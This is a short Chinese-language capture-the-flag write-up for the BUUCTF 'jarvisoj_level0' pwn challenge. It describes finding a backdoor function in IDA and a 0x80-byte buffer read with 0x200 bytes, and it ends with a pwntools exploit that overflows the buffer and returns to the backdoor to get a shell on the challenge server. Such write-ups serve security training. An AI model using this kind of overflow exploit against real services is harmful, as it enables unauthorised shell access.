[BUUCTF]PWN8——jarvisoj_level0

题目网址：https://buuoj.cn/challenges#jarvisoj_level0

步骤：
例行检查，64位，开启了NX保护

nc一下，看看程序的大概执行流程，回显Hello，world之后让我们输入

用64位ida打开，shift+f12查看字符串，发现了 system 和 /bin/sh

双击跟进，ctrl+x找到调用 /bin/sh 的函数，找到了程序里的后门，shell_addr=0x400596

根据之前nc看到的字符串，找到了输入点，ida给我们分析出来buf的大小是0x80，这边read读入0x200，可以造成溢出，覆盖返回地址为后门地址既可完成利用

exp

from pwn import*

r=remote('node3.buuoj.cn',25946)
payload='a'*(0x80+8)+p64(0x400596)
r.sendline(payload)
r.interactive()